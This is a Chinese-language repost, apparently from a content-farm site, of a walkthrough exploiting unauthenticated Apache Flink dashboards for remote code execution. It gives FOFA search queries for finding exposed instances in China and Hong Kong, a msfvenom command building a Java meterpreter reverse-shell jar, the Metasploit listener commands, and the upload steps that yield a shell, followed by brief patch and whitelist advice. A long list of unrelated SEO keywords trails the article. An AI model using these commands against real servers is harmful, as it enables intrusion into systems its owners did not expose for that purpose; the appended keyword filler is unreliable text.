Apache Flink未授权访问+远程代码执行的示例分析
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,这篇文章给大家分享的是有关Apache Flink未授权访问+远程代码执行的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。Apache Flink 未授权访问+远程
千家信息网最后更新 2025年12月02日Apache Flink未授权访问+远程代码执行的示例分析
这篇文章给大家分享的是有关Apache Flink未授权访问+远程代码执行的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
Apache Flink 未授权访问+远程代码执行
FOFA
FOFA 语句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"
国内还是很多使用 Apache Flink 的,大概有1K+的数量左右
漏洞复现
1、这里随便搞个站打开进行复现,打开以后就长这样子。
点击Submit New Job翻译:文件上传 2、打开MSF 生成一个 jar 木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=**.***.59.61 LPORT=4444 -f jar > testone.jar
3、点击 Add 上传 jar 文件
4、设置监听端口
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run
5、点击下 submit
6、反弹shell成功
修复建议
建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。临时解决建议 设置IP白名单只允许信任的IP访问控制台并添加访问认证。
感谢各位的阅读!关于"Apache Flink未授权访问+远程代码执行的示例分析"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
代码
建议
示例
分析
内容
文件
更多
漏洞
篇文章
不错
实用
成功
名单
控制台
数量
文章
木马
样子
用户
看吧
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
集群式服务器
亿流免费服务器
抓取数据库数据导致数据缺失
我国的软件开发厂商
唐山cmmi软件开发认证
网站服务器怎么改内容
开展网络安全教育作用
内外网的网络安全
网络技术应用试题粤教版
独占方式打开数据库是什么意思
农信社网络安全自查报告
搞定数据库事务
软件开发哪个大专好一点湖南的
数据库改列为行
机房服务器升级
服务器怎么连接电脑上
批量数据导入数据库
计算机网络安全账号
网络安全科技博览会
软件开发相关设备有哪些
系统找不到数据库文件夹
诛仙3服务器
致信服务器地址
重庆非遗数据库建设
金融科技互联网金融区别
java数据库网页
网络安全管理的五大功能
S2501串口服务器配置方法
魔兽世界俄罗斯服务器
机架式服务器噪音
